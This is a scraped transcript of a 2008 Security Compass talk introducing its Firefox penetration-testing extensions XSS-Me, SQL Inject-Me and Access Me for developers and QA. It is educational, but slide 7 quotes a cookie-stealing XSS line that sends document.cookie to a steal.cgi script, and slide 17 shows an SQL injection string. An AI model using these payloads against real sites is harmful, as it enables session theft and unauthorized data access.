Presentation is loading. Please wait.

Presentation is loading. Please wait.

© 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me.

Similar presentations


Presentation on theme: "© 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me."— Presentation transcript:

1 © 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me

2 © 2008 Security Compass inc. Tom Aratyn –Software Developer at Security Compass –Developed the Exploit Me tools Who are we? 2

3 © 2008 Security Compass inc. Jamie –Security Consultant for Security Compass –Background in security research, penetration testing, and software development Who are we? 3

4 © 2008 Security Compass inc. Cross-site scripting, really a danger? State of web application security XSS-Me SQL Inject-Me Access Me Agenda 4

5 © 2008 Security Compass inc. We know XSS can be dangerous, but can we use it to rob a bank? –AJAX + CSRF + XSS = Major problem XSS – Really a Danger? 5

6 © 2008 Security Compass inc. Reflected –Spit back as soon as it goes in –XSS-Me helps here Stored –Saving it for someone else –XSS-Me future version Two Exciting Flavours 6

7 © 2008 Security Compass inc. Un-validated user input executed by the users computer JavaScript is typically used –PDF files are XSS-able Someone took my cookie What is this XSS Stuff 7 location.href=“http:// /cgi-bin/steal.cgi?”+ escape(document.cookie); location.href=“http:// /cgi-bin/steal.cgi?”+ escape(document.cookie);

8 © 2008 Security Compass inc. AJAX is adding a new element into these attacks –AJAX was used in the IBDBank attack Attacker can play with data as if the victim is doing it –Send –Receive –Parse Someone Changed my App 8

9 © 2008 Security Compass inc. State of Web App Insecurity 9 Web app exploits outnumber buffer overflows in CVE Large portion of web apps suffer from XSS or SQL Injection

10 © 2008 Security Compass inc. Various tools exist –OWASP tools, commercial, Open Source Work very well –For what they were built to do Testing Tools 10

11 © 2008 Security Compass inc. Most tools not for developers or QA Developers and QA must be checking for security vulnerabilities Need lightweight tools The Missing Piece 11

12 © 2008 Security Compass inc. Firefox extension to test for cross-site scripting XSS-Me 0.4 to the Rescue 12

13 © 2008 Security Compass inc. Pick forms & fields to test Firefox 3 Import/export/add/remove XSS strings Test & Surf Heuristics to limit tests XSS-Me Features 13

14 © 2008 Security Compass inc. Checking all attacks against all fields is slow. –No, trust me, it’s slow Heuristic tests limit the fields we have to check by determining if we can inject them –Passes set of characters and checks if they’re returned (;\/<>=‘”) Heuristics? 14

15 © 2008 Security Compass inc. Attempts to set document.vulnerable=true into the DOM If property set, attack worked Also checks for plain text string, a potential vulnerability –OnMouseOver injection Behind the Magic 15

16 © 2008 Security Compass inc. Everyone says use Struts to protect yourself –Sure, just don’t follow the supplied examples Thank $deity for Struts 16

17 © 2008 Security Compass inc. Being Bobby 17 sql = “SELECT * FROM users WHERE username = ‘” & Request(“username”) & “’ AND password = '" & Request(“password”) & "'" User Input: username = jimmy password = blah’ OR ‘1’=‘1 SELECT * FROM users WHERE username = ‘jimmy’ AND password = ‘blah’ OR ‘1’=‘1’ Since “WHERE 1=1” is true for all records the entire table is returned! Courtesy XKCD.com

18 © 2008 Security Compass inc. Defence is well known and faster than what you’re doing now –Prepared Statements –Stored Procedure Ok, if you use exec in your procedure this is also vulnerable, but, you’re not doing that right? No Excuse 18

19 © 2008 Security Compass inc. Firefox extension to check for SQL injection SQL Inject-Me

20 © 2008 Security Compass inc. Pick what you test Configure attack and success strings Large default string set Firefox 3 Test & Surf SQL Inject-Me Features 20

21 © 2008 Security Compass inc. Web/application servers maybe vulnerable to HTTP Verb Tampering attacks Bypasses common authorization configurations What’s your method 21

22 © 2008 Security Compass inc. Access Me Firefox extension to check for authentication issues

23 © 2008 Security Compass inc. Checks for unauthenticated access vulnerabilities Checks for HTTP verb vulnerabilities Regular expression based parameter detection Automatic test as you surf Access Me Features 23

24 © 2008 Security Compass inc. Detecting Access Vulnerabilities 24 Failed if response status is 200 and response too similar Warning if response status is 200 or response too similar

25 © 2008 Security Compass inc. Available off of our website –www.securitycompass.comwww.securitycompass.com Extra XSS-Me attack strings also available from site Open sourced under GPL v3 Where can you get ‘em 25

26 © 2008 Security Compass inc. May include –Spidering Stored attacks The Future... 26

27 © 2008 Security Compass inc. Lets have ‘em 27


Download ppt "© 2008 Security Compass inc. 1 Firefox Plug-ins for Application Penetration Testing Exploit-Me."

Similar presentations


Ads by Google